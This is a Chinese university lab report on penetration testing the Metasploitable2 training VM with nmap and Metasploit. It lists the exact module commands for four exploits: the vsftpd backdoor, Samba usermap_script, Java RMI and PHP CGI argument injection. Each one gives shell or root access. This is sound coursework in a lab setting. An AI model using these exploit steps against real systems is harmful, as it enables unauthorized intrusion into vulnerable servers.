首页 > 其他分享 >20222322 2024-2025-1 《网络与系统攻防技术》实验六实验报告

20222322 2024-2025-1 《网络与系统攻防技术》实验六实验报告

时间:2024-11-19 18:08:19浏览次数:1  
标签:漏洞 主机 192.168 2024 2025 exploit 20222322 靶机 输入

1.实验内容

掌握使用Metasploit和nmap等工具进行前期渗透的方法,并利用四种特定的漏洞对靶机进行攻击。

(1)掌握Metasploit和nmap的用法
学习并熟悉Metasploit框架的基本操作,包括模块搜索(Search)、使用(Use)、展示选项(Show)、设置参数(Set)以及执行攻击(Exploit/run)的流程。

(2)学习前期渗透的方法
利用nmap等工具对目标主机进行主机发现,确定目标主机的IP地址和在线状态。
进行端口扫描,列出目标主机上开放的端口及其对应的服务。
扫系统版本,确定目标主机上运行的操作系统和服务软件的版本信息。
查找并确认目标主机上存在的已知漏洞,为后续的漏洞利用攻击做准备。

(3)利用四种漏洞对靶机进行攻击

  • Vsftpd源码包后门漏洞:利用特定版本的vsftpd服务器程序中的后门代码,触发后门监听6200端口,并执行任意代码。
  • SambaMS-RPC Shell命令注入漏洞:通过向Samba服务的MS-RPC接口提交恶意输入,利用未经过滤的用户输入执行任意命令,以nobody用户的权限获取对目标主机的控制权。
  • Java RMI SERVER命令执行漏洞:利用Java RMI Server的RMI注册表和RMI激活服务中的安全漏洞,执行远程代码,获取对目标主机的控制权。
  • PHP CGI参数执行注入漏洞:通过在请求参数中插入执行命令,利用CGI脚本未正确处理请求参数的漏洞,执行任意代码,获取对目标主机的控制权。

2.实验过程

2.1前期渗透

  1. 下载靶机Metasploitable2,并获取靶机ip地址。使用ipconfig得到地址为192.168.36.149。

  2. 在kali中打开msfconsole,输入以下命令发现主机。

search arp_sweep
use 0
set RHOSTS 192.128.36.0/24
run

找到了靶机!!!!

  1. 命令行输入nmap -p 1-2048 192.168.36.149查看靶机开放的端口。

或者使用Aux中的portscan/tcp,输入以下命令:

search portscan/tcp
use 0
set RHOSTS 192.168.36.149
exploit

  1. 扫描系统版本、漏洞
search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.1.8
exploit


目标主机运行的是Unix操作系统,版本为Samba 3.0.20-Debian,并使用SMBv1协议,存在已知漏洞。

2.2Vsftpd源码包后门漏洞(21端口)
打开msfconsole后输入以下命令:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.36.149
run

再输入uname -a,pwd,id命令进行测试,可以看到已经获取靶机的shell,攻击成功。

2.3SambaMS-RPC Shell命令注入漏洞(端口139)
打开msfconsole后输入以下命令:

use exploit/multi/samba/usermap_script
set RHOST 192.168.36.149
exploit

再输入uname -a命令获取靶机的shell,攻击成功。

2.4Java RMI SERVER命令执行漏洞(1099端口)
经过前期渗透可以看见1099端口开放

在msfconsole中输入以下命令:

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.36.149
exploit
shell

输入命令whoami,得到结果root,说明攻击成功。

2.5PHP CGI参数执行注入漏洞(80端口)
在msfconsole中输入以下命令:

use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.36.149
exploit
shell

输入pwd、uname -a、id、dir等检测是否攻击成功,可以执行命令,说明攻击成功。

3.问题及解决方案

  • 问题1:发现主机的时候,一直没有找到,卡在之前的ip的网段的“.1”主机。
  • 问题1解决方案:发现两台虚拟机不在同一网段,将虚拟机换成NET模式,重新启动虚拟机即可。

4.学习感悟、思考等

这次渗透测试实验比较简单,几乎没有遇到问题,我亲自操作Metasploit和Nmap这两款工具,亲历了从信息收集、端口扫描到漏洞探测的全过程。Metasploit的模块化与自动化特性,简化了攻击流程,在面对不同类型的漏洞时,迅速找到对应的攻击模块,用简单的语句就能进行攻击,让我体验到站在巨人肩膀上解决问题的便捷与强大。实验过程中对漏洞的成功利用,增强了我的实践能力,也揭示了网络安全的脆弱性与保护的紧迫性,意识到持续学习与适应新技术对于维护网络安全至关重要。

标签:漏洞,主机,192.168,2024,2025,exploit,20222322,靶机,输入
From: https://www.cnblogs.com/lulu-20222322/p/18555362

相关文章

  • 20222303 2024-2025-1 《网络与系统攻防技术》实验五实验报告
    1.实验内容对网站进行DNS域名查询,包括注册人、IP地址等信息,还通过相关命令查询IP地址注册人及地理位置。尝试获取QQ好友IP地址并查询其地理位置。使用nmap对靶机环境扫描,获取靶机IP活跃状态、开放端口、操作系统版本、安装服务等信息。使用Nessus对靶机环境扫......
  • 2024下半年软考各地报名人数汇总!这些地区软考最火爆!
    2024年下半年软考已经结束,部分地区也公布了2024下半年软考报考人数,让我们一起看看今年软考的热度如何吧!从目前的数据来看,软考的热度依旧不减。尤其是广东地区,预计报名人数高达18.4万人;湖南、云南和陕西省都是1万多人;浙江10个市加起来的报名人数共36440人,其中杭州报名人数共284......
  • 【刷题笔记】[BalticOI 2024] Portal
    【刷题笔记】[BalticOI2024]Portal\(Solution\)先注意到,题目中的图形是许多的自相似图形,要求能满足要求的单位图形的最大面积先考虑只有一维的情况,设几个传送门的坐标为\((a_i,0)\)```发现将整个图形平移后答案不会改变,所以不妨把一个传送门移动到\((0,0)\)可以发现单......
  • 帝国CMS存在SQL注入漏洞(CNVD-2024-4321448、CVE-2023-50073)
    帝国CMS(EmpireCMS )是一款非常出名的网站管理系统,用户也非常多。 国家信息安全漏洞共享平台于2024-11-06公布其存在SQL注入漏洞。漏洞编号:CVE-2024-44725、CNVD-2024-43215影响产品:帝国CMSV7.5漏洞级别:高公布时间:2024-11-06漏洞描述:帝国CMS v7.5版本存在SQL注入漏洞,该漏......
  • SeaCMS(海洋CMS)跨站脚本漏洞(CNVD-2024-39583、CVE-2024-44683)
    SeaCMS(海洋CMS)是一款开源免费PHP影视系统,该系统主要被设计用来管理视频点播资源,因其功能强大,操作使用简单,拥有大量用户。 国家信息安全漏洞共享平台于2024-09-29公布其存在跨站脚本漏洞。漏洞编号:CNVD-2024-39583、CVE-2024-44683影响产品:SeaCMS(海洋CMS)13.0漏洞级别:中公布......
  • 2024.11.19 模拟赛
    11.19模拟赛题目质量点赞!好题!storm普及组模拟题god有趣的dp题key:考察相对位置设计状态\(f(i,j)\)表示考虑后\(i\)个操作,经过了相对坐标为\(j\)的点的概率。转移中,如果这一步不动,相对坐标不变;否则,相对坐标整体平移。答案就是\(f(n,j)\)。fate瞎搞贪心题显然从......
  • SeaCMS(海洋CMS)存在MySQL慢查询漏洞(CNVD-2024-39253、CVE-2024-46640)
    SeaCMS(海洋CMS)是一款开源免费PHP影视系统,因其功能强大,操作使用简单,拥有大量用户。 国家信息安全漏洞共享平台于2024-09-26公布其存在MySQL慢查询漏洞。漏洞编号:CNVD-2024-39253、CVE-2024-46640影响产品:SeaCMS(海洋CMS) 13.2漏洞级别:高公布时间:2024-09-26漏洞描述:攻击者可......
  • ZZCMS存在SQL注入漏洞(CNVD-2024-43213、CVE-2024-10291)
    ZZCMS是一款用于搭建招商网站的CMS系统,由PHP语言开发。 国家信息安全漏洞共享平台于2024-11-06公布其存在SQL注入漏洞。漏洞编号:CNVD-2024-43213、CVE-2024-10291影响产品:ZZCMS2023漏洞级别:中公布时间:2024-11-06漏洞描述:漏洞位于源文件“/Ebak5.1/upload/phome.php”中的......
  • 【SkekchUp Pro 2024下载与安装教程】
    SketchUp Pro 2024作为一款专业的3D建模软件,在建筑设计、城市规划和室内设计等领域具有广泛的应用前景.‌安装SketchUpPro2024的基本要求:‌操作系统要求‌Windows系统‌:SketchUpPro2024支持Windows10和Windows11操作系统。确保你的系统是最新的,并且已经安装了所有重......
  • 20222416 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    1.实验内容本次实验使用的MetasploitFramework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程。(1)前期渗透①主机发现(可用Aux中的arp_sweep,search一下就可以use)②端口扫描:可以直......